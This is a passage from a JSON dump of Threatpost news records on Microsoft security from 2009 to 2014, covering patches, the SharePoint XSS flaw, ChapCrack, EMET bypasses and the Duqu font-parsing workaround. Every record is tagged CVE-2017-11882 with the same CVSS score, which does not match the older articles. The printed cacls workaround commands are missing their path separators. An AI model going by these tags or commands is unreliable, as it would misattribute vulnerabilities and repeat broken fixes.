updates](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) because a number of users reported crashes and blue screens. The patch was removed from Windows Update on Aug. 15, three days after it was released as part of Microsoft\u2019s monthly patch cycle.\n\n\u201cAs soon as we became aware of some problems, we began a review and then immediately pulled the problematic updates, making these unavailable to download,\u201d said Tracey Pretorius, director, Trustworthy Computing at Microsoft. \u201cWe then began working on a plan to rerelease the affected updates.\u201d\n\n[MS14-045](<https://technet.microsoft.com/en-us/library/security/ms14-045.aspx>) patched vulnerabilities in kernel-mode drivers that were rated important by Microsoft because they require valid credentials and local access in order to exploit. Successful exploits could have led to an elevation of privileges on a compromised Windows machine.\n\nMicrosoft said at the time that a font issue patched in the update was the culprit causing the reported system crashes. Microsoft said that only a small number of computers were affected. There were other issues with the bulletin, the most serious causing systems to crash and render a 0x50 Stop error message after installation. Users were also seeing \u201cFile in Use\u201d error messages because of the font issue in question.\n\nThe bugs affect Windows systems all the way back to Windows Server 2003 and all supported desktop versions of Windows. Windows Update users will automatically get the patch, otherwise, Microsoft urges users to install the update.\n\nThis month\u2019s update had a distinct IE feel to them with another cumulative update patching 26 vulnerabilities in Microsoft\u2019s flagship browser, including a publicly reported vulnerability that is likely being exploited in the wild. All 26 vulnerabilities were rated critical and could be remotely exploited.\n\nThe update came on the heels of an announcement at the start of the month alerting users that Microsoft would, in 18 months, no longer support older version of the browser. With a rash of zero-days and high profile exploits targeting older versions of IE, such as 6, 7 and 8, Microsoft made it clear that users should use only a current browser with modern memory exploit mitigations built in.\n\nMicrosoft also announced it would be [blocking older ActiveX controls in Internet Explorer](<http://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672>), starting with out of date versions of Java, another platform heavily targeted by hackers.\n\nThe next scheduled Patch Tuesday security bulletins release is set for Sept. 9.\n", "cvss3": {}, "published": "2014-08-27T14:08:58", "type": "threatpost", "title": "Microsoft Re-Releases Broken Security Patch MS14-045", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T12:04:44", "id": "THREATPOST:2DAD0426512A1257D3D75569F282640E", "href": "https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:36", "description": "Dennis Fisher talks with Ryan Naraine about the new Microsoft bug bounty program, how it may affect prices for vulnerabilities on the private market and why it took the company so long to start the reward program.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>\n\nDownload: [digital_underground_116](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044126/digital_underground_116.mp3>)[ \n](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>)\n", "cvss3": {}, "published": "2013-06-21T09:49:19", "type": "threatpost", "title": "Ryan Naraine on Microsoft's New Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-16T20:41:20", "id": "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "href": "https://threatpost.com/ryan-naraine-on-microsofts-bug-bounty-program/101053/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:52", "description": "[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060714/katie_moussouris2.jpg>)Dennis Fisher talks with Katie Moussouris of Microsoft about her childhood exploits with Commodore 64 programming, ignoring her Barbies, growing up as a hacker, her days as a pen tester and the challenges of working on security at Microsoft.\n\nDownload: [12_moussouris.mp3](<http://traffic.libsyn.com/digitalunderground/10_moussouris.mp3>)\n\n_*Microsoft image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2018s Flickr photostream, Creative Commons_\n", "cvss3": {}, "published": "2013-11-04T09:00:25", "type": "threatpost", "title": "How I Got Here: Katie Moussouris", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-04T19:16:25", "id": "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "href": "https://threatpost.com/how-i-got-here-katie-moussouris/102784/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:05", "description": "[](<https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/>)It\u2019s been more than 10 years now since Microsoft began the initiative that would eventually become Trustworthy Computing, and while the effects it\u2019s had inside the company have been well documented, the utility and adoption of the Security Development Lifecycle by outside organizations and customers is less well-known. Several large organizations have adopted the SDL, either in whole or in part, and Microsoft executives say that the effects on these organizations are going to be just as important as they were for Microsoft.\n\nThe company this week is hosting its first Security Development Conference in Washington, D.C., and one of the things that Microsoft executives are focusing on is how the SDL has spread beyond Redmond and taken hold in a number of other industries and organizations. One of those recent adopters of the SDL is Itron, a company that manufacturers smart meters for installation around the world. Those meters are used to regulate and measure power usage in homes and businesses and the use of these machines has become somewhat controversial in the security community because of potential vulnerabilities and attacks. \n\nTo help address those issues, Itron began a software security program, based on the Microsoft SDL. The idea behind the effort is to address potential security bugs and attack vectors before the meters are deployed. Steve Lipner, one of the driving forces behind the Trustworthy Computing initative and SDL at Microsoft, said in an interview that the company is happy to see the SDL spreading beyond Microsoft\u2019s walls and having an effect in other industries.\n\n\u201cIt\u2019s very important to see adoption by governments and private industry,\u201d he said. \u201cThe adoption of secure development can have an important global effect. Some of the meter specifications involve providing a disconnect switch on the meters and they needed to get the security right or the consequences could be devastating.\u201d\n\nSecurity researchers already have discovered [vulnerabilities in some smart meters](<https://threatpost.com/researchers-find-security-flaws-smart-meters-033110/>) and privacy advocates have questioned whether the data on the meters will be protected adequately. Last year, California approved new [data security rules for smart meters](<https://threatpost.com/california-approves-data-security-rules-smart-meters-081711/>), which prevent the utilities from disclosing customers\u2019 usage or other data to third parties. Those same concerns about attacks and vulnerabilities are what is driving the use of the SDL at Itron.\n\n\u201cThe light bulb went off for me when my customer looked across the table and said, \u2018We\u2019re planning on putting disconnect switches on every meter,\u2019\u201d Michael Garrison Stuber, an engineering advisor at Itron, said. \u201cThe implication was that this level of access to the network would equal the ability to control that network. From that standpoint I immediately realized, \u2018This could be a giant target.\u2019\u201d\n\nFor some companies, the development of a software security program is driven by a recent security failure or series of attacks, but for others it\u2019s more a case of customers pushing the vendor. That was the case for Microsoft when it began its effort more than a decade ago, and also for Itron. But some of the motivation also came from not wanting to go through the typical release, bug, patch cycle any longer. Paying pen testers and consultants to find bugs after the products are made can be an expensive proposition.\n\n\u201cI got tired of writing six-figure checks to these outside vendors,\u201d said Stuber. \u201cFrom a business standpoint it just made perfect sense to me that we need to be investing in how we do development so we\u2019re thinking about security throughout the lifecycle.\u201d\n\nLipner said he\u2019d like to see even more adoption of the SDL in other industries.\n\n\u201cWe\u2019re encouraging customers to adopt the tools we\u2019ve published as a way to save money and build more secure software,\u201d he said. \u201cThe customers need to demand secure development practices.\u201d\n", "cvss3": {}, "published": "2012-05-16T13:14:29", "type": "threatpost", "title": "Microsoft's SDL Expands Beyond Redmond", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:14", "id": "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "href": "https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/76570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:55", "description": "[](<https://threatpost.com/new-flaw-found-microsoft-sharepoint-042910/>)There is a [cross-site scripting flaw in SharePoint 2007](<http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html>), Microsoft\u2019s collaboration product, which could give an attacker the ability to execute arbitrary JavaScript code on a machine through a browser. \n\nHigh-Tech Bridge, a Swiss security firm, published an advisory about the vulnerability on Thursday, along with proof-of-concept code to demonstrate the exploit. \n\n\u201cThe vulnerability exists due to failure in the \u201c/_layouts/help.aspx\u201d \nscript to properly sanitize user-supplied input in \u201ccid0\u2033 variable. \nSuccessful exploitation of this vulnerability could result in a \ncompromise of the application, theft of cookie-based authentication \ncredentials, disclosure or modification of sensitive data,\u201d the company said in its advisory.\n\nMicrosoft\u2019s Security Response Center said it is working on mitigations, workarounds and a fix for the vulnerability. \n", "cvss3": {}, "published": "2010-04-29T17:12:54", "type": "threatpost", "title": "New Flaw Found in Microsoft SharePoint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:53:17", "id": "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "href": "https://threatpost.com/new-flaw-found-microsoft-sharepoint-042910/73898/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:02", "description": "[](<https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/>)Microsoft Corp. issued their monthly security bulletins on Tuesday, with fixes for four known vulnerabilities in the company\u2019s Windows operating system, Office suite and Remote Desktop Connection products. \n\nThe March patch release included three bulletins: [MS11-015](<http://www.microsoft.com/technet/security/bulletin/ms11-015.mspx>), [016 ](<http://www.microsoft.com/technet/security/bulletin/ms11-016.mspx>)and [017](<http://www.microsoft.com/technet/security/bulletin/ms11-017.mspx>). Only one, MS11-015, is rated critical \u2013 indicating a danger of the holes being used in remote attacks or to enable fast spreading worms. The other two bulletins are rated \u201cimportant.\u201d \n\nMS11-015 fixes a publicly disclosed hole in the DirectShow product and one previously undisclosed vulnerability in Windows Media Player and Media Center. The vulnerabilities, if exploited, would have allowed attackers to use specially crafted Microsoft Digital Video Recording (.dvr-ms) files to run malicious code on a vulnerable Windows system. Microsoft rated it critical for affected versions of Windows XP, as well as all supported versions of Windows Vista and Windows 7. Windows Media Center TV Pack for Vista is also affected, the company said. \n\nBoth the MS11-016 and 017 patches address DLL preloading issues in Microsoft products \u2013 Microsoft Groove 2007 Service Pack 2, and Windows Remote Client Desktop. That issue, which affects a wide range of software from different vendors, was first disclosed in August 2010. In September, Microsoft [released guidance on the](<https://threatpost.com/microsoft-publishes-new-fixit-tool-dll-bug-090110/>) impact of the DLL hijacking bug, and a Fix-It tool that allowed customers to ameliorate the impact of the hole.\n\nThe company did not issue a fix for a serious flaw in the way that Windows manages MHTML operations. As Threatpost [reported last month](<https://threatpost.com/microsoft-warns-mhtml-bug-windows-012811/>), that hole affects all current versions of Windows and could allow an attacker to run code on vulnerable systems. In its bulletin, Microsoft issued a Security Advisory about the MHTML bug in January. In its March Patch release, the company said that it was \u201cmonitoring the threat landscape\u201d and \u201cworking to provide a solution through our monthly security update release process,\u201d suggesting that the company would not do an out-of-cycle security patch to plug the MHTML hole once a fix is available. \n\nMarch\u2019s batch of patches is smaller than the company\u2019s February release, which [comprised 12 separate bulletins containing fixes for 22 vulnerabilities across a range of products](<https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/>).\n", "cvss3": {}, "published": "2011-03-08T21:23:27", "type": "threatpost", "title": "Microsoft Fills Windows, Office Holes with March Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:00", "id": "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "href": "https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/75006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "description": "Microsoft\u2019s Bing is looking into SSL and other privacy \nsettings for the next version of their search engine. Currently the site strips \nSSL when forced into HTTPS and in turn, brings up an advisory on browsers signaling \nan unsafe connection.\n\n[Introduced at Toorcon, the Firefox extension ](<https://threatpost.com/plugin-firesheep-lays-open-web-20-insecurity-102510/>)allows \nattackers to capture site cookies from users on unsecured wireless networks and \nbrowse under their logon. \n\nWith the advent of Firesheep and subsequently, its surge of recently \nconverted hackers, HTTP session hijacking is becoming more and more of a \nconcern. Sites like Bing will have to adopt suitable security techniques to \ncontend with the extensions\u2019 further proliferation. \n\nFirefox 4, scheduled for release by the end of the year will \nhelp. [As \nreported in August](<https://threatpost.com/firefox-4-include-http-strict-transport-security-support-082710/>), the browser will receive HTTP Strict Transport \nSecurity, ensuring the browser always requests a safe HTTPS session from sites. \nHowever If sites like Bing don\u2019t implement SSL into sites, the lack of full-end \nencryption will still be a problem and HTTPS won\u2019t even be an option.\n\n[Network \nWorld has more on this story.](<http://www.networkworld.com/community/blog/microsoft-considering-encryption-bing>)\n\n** \n**\n", "cvss3": {}, "published": "2010-10-29T19:51:24", "type": "threatpost", "title": "To Combat Firesheep, Microsoft's Bing Looking Into SSL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:46", "id": "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "href": "https://threatpost.com/combat-firesheep-microsoft-s-bing-looking-ssl-102910/74624/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "[](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>)\n\nLess than a week after the [publication of exploit code](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) for a gaping hole in the FTP Service in Microsoft Internet Information Services (IIS), attackers are launching what is described as \u201climited attacks\u201d against Windows users.\n\nMicrosoft has updated its security advisory to warn of the new attacks and added new mitigation workarounds for business running (IIS) 5.0, 5.1, and 6.0.\n\nIn addition to the in-the-wild attacks, Microsoft warned that a new proof of concept has been published to demonstrate a denial-of-service attack on Windows XP and Windows Server 2003 with read access to the File Transfer Protocol (FTP) service.\n\n\u201cThis does not require Write access,\u201d the company warned. \n\nAlso, a new proof of concept allowing DoS was separately disclosed that affects the version of FTP 6 which shipped with Windows Vista and Windows Server 2008. \n\n * Customers should be aware that the Download Center has FTP 7.5 available for Windows Vista and Windows Server 2008. FTP 7.5 is not vulnerable to any of these exploits.\n\nEarlier this week, [Microsoft issued an advisory](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) to confirm the severity of this vulnerability, which allows remote code execution on affected systems running the FTP service and connected to the Internet.\n", "cvss3": {}, "published": "2009-09-08T11:58:04", "type": "threatpost", "title": "Attackers Pounce on Microsoft FTP in IIS Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:48", "id": "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "href": "https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/72235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:24", "description": "Microsoft is warning customers about the availability of the [ChapCrack tool that Moxie Marlinspike built](<https://threatpost.com/new-tool-moxie-marlinspike-cracks-some-crypto-passwords-073012/>) to crack the VPN credentials for systems built on MS-CHAPv2 protocol. The company said that while it\u2019s not aware of any active attacks using the tool, customers can protect themselves by implementing PEAP or changing to a more secure VPN tunnel.\n\nMarlinspike unveiled the ChapCrack tool at DEF CON last month, and it\u2019s designed to take packet captures from sessions using the MS-CHAPv2 protocol and strip out the user\u2019s credentials from the cryptographic handshake in the session. In order to decrypt the user\u2019s credentials, Marlinspike submits the packet to CloudCracker, which sends back a packet that he can put back into ChapCrack, which then will crack the password.\n\nIn its advisory, Microsoft says that while the ChapCrack tool doesn\u2019t take advantage of a security vulnerability per se, it still represents a risk to users.\n\n\u201cAn attacker who successfully exploited these cryptographic weaknesses could obtain user credentials. Those credentials could then be re-used to authenticate the attacker to network resources, and the attacker could take any action that the user could take on that network resource,\u201d the company said in its [advisory on ChapCrack](<http://technet.microsoft.com/en-us/security/advisory/2743314>).\n\n\u201cAn attacker has to be able to intercept the victim\u2019s MS-CHAP v2 handshake in order to exploit this weakness, by performing man-in-the-middle attacks or by intercepting open wireless traffic. An attacker who obtained the MS-CHAP v2 authentication traffic could then use the exploit code to decrypt a user\u2019s credentials.\u201d\n\nMicrosoft recommends that customers who use MS-CHAPv2 implement PEAP (protected extensible authentication protocol) to further secure their VPNs. \n", "cvss3": {}, "published": "2012-08-20T19:11:41", "type": "threatpost", "title": "Microsoft Warns Users About ChapCrack Tool Availability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:41", "id": "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "href": "https://threatpost.com/microsoft-warns-users-about-chapcrack-tool-availability-082012/76929/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:16", "description": "Exploits bypassing Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, are quickly becoming a parlor game for security researchers. With increasing frequency, white hats are poking holes in EMET, and to its credit, Microsoft has been quick to not only address those issues but challenge and reward researchers who successfully submit bypasses to its [bounty program](<http://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328>).\n\nThe tide may be turning, however, if the latest Internet Explorer zero day is any indication. An exploit used as part of the [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) against U.S. military targets contained a feature that checked whether an EMET library was running on the compromised host, and if so, the attack would not execute.\n\nThat\u2019s not the same as an in-the-wild exploit for EMET, but that may not be too far down the road, especially when you take into consideration two important factors: Microsoft continues to market EMET as an effective and temporary zero-day mitigation until a patch is released; and the impending end-of-life of Windows XP on April 8 could spark a surge in EMET installations as a stopgap.\n\nIn the meantime, the [EMET bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) keep on coming. The latest targeted a couple of mitigations in the [EMET 5.0 Technical Preview](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) released last week during RSA Conference 2014. Researchers at Exodus Intelligence refused to share much in the way of details on the exploit, preferring to offer it to its customers before making it available for public consumption. A tweet from cofounder and vice president of operations Peter Vreugdenhil said: \u201cEMET 5 bypassed with 20 ROP gadgets. ntdll only, esp points to heap containing fake stack, no other regs required. Adding to our feed soon.\u201d\n\nVreugdenhil is a fan of EMET, and is in the camp that believes hackers will be adding EMET bypasses to exploits within a year or two, despite the EMET module in Operation SnowMan, which he believes was added in order to keep the campaign from being detected as long as possible.\n\n\u201cI think most of the reason is that the return on investment for the bad guys is really not that high at this point,\u201d Vreugdenhil said. \u201cThat also means that by the time everybody actually uses [EMET] and the more ground it gains, the more likely it becomes that return on investment for the bad guys will be high enough for them to add it to their exploits.\u201d\n\nEMET provides users with a dozen [mitigations against memory-based exploits](<http://technet.microsoft.com/en-us/security/jj653751>), including ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and five return-oriented programming mitigations. ROP chains are the most effective bypass technique is use today, one that Vreugdenhil has used on a couple of occasions against EMET.\n\nWriting exploits targeting EMET, he said, is a little more involved than targeting a vulnerability in third-party software such as Flash or Java. Vreugdenhil said he generally starts with a publicly available exploit such as the latest IE 10 zero day and observes the crash the bug causes in order to understand how it corrupts memory and hopefully discloses memory that can be used to build an ROP chain. Microsoft\u2019s addition of Data Execution Prevention and ASLR in Windows Vista and Windows 7 prevents attackers from executing code in a particular memory location because those memory modules are now randomized.\n\n\u201cBack in Windows XP when there was no ASLR and no randomization of the modules, it was relatively easy. You would just pick a module and then reuse the code inside that module to still get code execution,\u201d Vreugdenhil said. \u201cWindows 7 came out and put the bar higher by shuffling the modules around, so theoretically, you didn\u2019t know where your modules were in the process. It theoretically should be impossible to point at an address and say \u2018Hey would you execute code at that address because I know there\u2019s something going to be there.\u2019\u201d\n\nIf an attacker can force a process to leak memory from inside back to an exploit, the attacker will be able to reuse that information and bypass ASLR and DEP because he will know where the memory module is located, Vreugdenhil said. From there, an attacker needs to figure out additional memory protections in place, and address those to control the underlying system.\n\n\u201cIn the case of EMET, there\u2019s a long list of protection mechanisms it adds, there\u2019s only two or three that could be a hindrance if you\u2019re writing a client-side IE exploit. And so it\u2019s usually just a matter of figuring out what they are and coming up with ways to sidestep them,\u201d Vreugdenhil said. \u201cIf we can do it, we assume there\u2019s many more people who can do it, and it\u2019s also going to be used by the bad guys anywhere between now and a year or two years.\u201d\n", "cvss3": {}, "published": "2014-03-05T10:07:31", "type": "threatpost", "title": "Researchers Investing in EMET Bypasses More than Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-05T20:45:44", "id": "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "href": "https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:13", "description": "[](<https://threatpost.com/hotmail-limits-passwords-16-characters-092112/>)Passwords, unfortunately, still are the main authentication mechanism on most Web sites, including all of the popular webmail services, such as Hotmail, Gmail and Yahoo Mail. Many sites encourage users to pick complex and long passwords, so it\u2019s surprising to see that Microsoft now has limited Hotmail passwords to no more than 16 characters. Even more surprising, however, is that Hotmail will accept the first 16 characters of an existing, longer password, indicating that the company may have been storing users\u2019 passwords in plaintext.\n\nMicrosoft officials say that there has been a 16-character limit for Hotmail accounts for some time. But security researchers who looked at the requirement found it odd, to say the least. Sixteen characters is a somewhat arbitrary limit, but the more interesting bit is why Microsoft chose to make the change at all.\n\nThe real question, however, is what the implications of the change are. As [Costin Raiu](<https://www.securelist.com/en/blog/208193844/Hotmail_Your_password_was_too_long_so_we_fixed_it_for_you>), head of Kaspersky Lab\u2019s GReAT research team, wrote in an analysis of the issue, one possibility is that Microsoft has been truncating longer passwords to 16 characters all along and then hashing those first 16 characters. The other possibility is somewhat more troubling.\n\n\u201cMy previous password has been around 30 chars in size and now, it doesn\u2019t work anymore. However, I could login by typing just the first 16 chars,\u201d he wrote.\n\n\u201cTo pull this trick with older passwords, Microsoft had two choices:\n\n* store full plaintext passwords in their db; compare the first 16 chars only \n* calculate the hash only on the first 16; ignore the rest\n\nStoring plaintext passwords for online services is a definite no-no in security. The other choice could mean that since its inception, Hotmail was silently using only the first 16 chars of the password. To be honest, I\u2019m not sure which one is worse.\u201d\n\nMicrosoft officials did not respond to questions on this issue.\n\nIn order to keep passwords safe from snooping, many Web sites run users\u2019 plaintext passwords through a hash function, which obscures them. Depending upon which hash function is being used, and what kind of computers is used to do the cracking, the length of time needed to crack a password hash can vary greatly. \n\n\u201cPlease note our research has shown uniqueness is more important than length and (like all major account systems) we see criminals attempt to victimize our customers in various ways; however, while we agree that in general longer is better, we\u2019ve found the vast majority of attacks are through phishing, malware infected machines and the reuse of passwords on third-party sites \u2013 none of which are helped by very long passwords,\u201d a Microsoft spokesman said. \n\n\u201cSixteen characters has been the limit for years now. We will always prioritize the protection needs of users\u2019 accounts and we will continue to monitor the new ways hijackers and spammers attempt to compromise accounts, and we design innovative features based on this. At this time, we encourage customers to frequently reset their Microsoft account passwords and use unique passwords that are different from other services.\u201d\n\n_This story was updated on Sept. 24 to add a comment from Microsoft. _\n", "cvss3": {}, "published": "2012-09-21T17:59:05", "type": "threatpost", "title": "Hotmail Limits Passwords to 16 Characters", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:29", "id": "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "href": "https://threatpost.com/hotmail-limits-passwords-16-characters-092112/77038/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "Dennis Fisher talks with Adam Shostack of Microsoft about the taxonomy he helped develop for classifying how PCs are compromised, what he would and wouldn\u2019t change in The New School of Information Security and who he\u2019s learned the most from.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\nImage via [adamshostack](<http://www.flickr.com/photos/adamshostack/7308776486/in/photolist-c8RoBG/lightbox/>)\u2018s Flickr photostream, Creative Commons\n", "cvss3": {}, "published": "2011-12-12T15:12:45", "type": "threatpost", "title": "Adam Shostack on Methods of Compromise, the New School and Learning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:46:17", "id": "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "href": "https://threatpost.com/adam-shostack-methods-compromise-new-school-and-learning-121211/75984/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:30", "description": "[](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>)Microsoft has released a workaround for the [Windows kernel zero-day vulnerability exploited by the Duqu](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) malware, and said that it is working on a permanent patch, but didn\u2019t specify a timeline for its release. The vulnerability is a serious one that can lead to remote code execution on vulnerable machines.\n\nIn an advisory issued Thursday night, Microsoft security officials said that the flaw is in the TrueType font parsing engine in Windows. This is the first time that the exact location and nature of the flaw has been made public. Microsoft said that the permanent fix for the new vulnerability will not be ready in time for next week\u2019s November patch Tuesday release. The [FixIt tool](<http://support.microsoft.com/kb/2639658>) that Microsoft released Thursday automatically applies the workaround that the company suggests in its security [advisory on the Windows kernel flaw](<https://technet.microsoft.com/en-us/security/advisory/2639658>).\n\nTo apply the workaround manually, users of 32-bit systems can enter the following at the command prompt:\n\n`Echo y| cacls \"%windir%system32t2embed.dll\" /E /P everyone:N`\n\nFor 64-bit systems, users should enter this at the command prompt:\n\n`Echo y| cacls \"%windir%system32t2embed.dll\" /E /P everyone:N`\n\n`Echo y| cacls \"%windir%syswow64t2embed.dll\" /E /P everyone:N`\n\nMicrosoft said in its advisory that although the overall effect of the vulnerability is low thus far, it has been used in some targeted attacks by the [Duqu malware](<https://threatpost.com/using-stuxnet-and-duqu-words-mass-disruption-102011/>).\n\n\u201cMicrosoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time.,\u201d the advisory says.\n\nThe company said it is monitoring the ongoing attacks and is aware that the kind and prevalence of the attacks could change quickly, so it is recommending that users install the workaround now and then the patch when it is available.\n\n\u201cFinally, given our ability to detect exploit attempts for this issue, we are able to closely monitor the threat landscape and will notify customers if we see any indication of increased risk. As previously stated, the risk for customers remains low. However, that is subject to change so we encourage customers to either apply the workaround or ensure their anti-malware vendor has added new signatures based on the information we\u2019ve provided them to ensure protections are in place for this issue,\u201d [Microsoft\u2019s Jerry Bryant](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) said in a blog post.\n", "cvss3": {}, "published": "2011-11-04T11:47:32", "type": "threatpost", "title": "Microsoft Releases Workaround For Kernel Flaw Used By Duqu", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:25", "id": "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "href": "https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/75850/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:18", "description": "[From CIO (Robert McMillan)](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>)\n\n[](<https://threatpost.com/after-attacks-microsoft-readies-security-patches-040909/>)Corporate IT staffers will get a double whammy next week, as both [Microsoft and Oracle are set to release critical security updates](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>) [cio.com] on the same day, including a likely fix for an Excel bug that has been used by cybercriminals.\n\nThis month, Oracle\u2019s quarterly software fixes and Microsoft\u2019s monthly patches happen to fall on the same day, next Tuesday. For Windows users, there will be a lot to patch. Microsoft plans to release [eight updates in total](<http://www.microsoft.com/technet/security/bulletin/ms09-apr.mspx>) [microsoft.com]: Five of them are for Windows, with a single update each for Internet Explorer, Excel and Microsoft\u2019s Internet Security and Acceleration (ISA) server. [Read the full story](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>). More from [ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3116>) [zdnet.com]\n", "cvss3": {}, "published": "2009-04-09T20:27:27", "type": "threatpost", "title": "After attacks, Microsoft readies security patches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:26", "id": 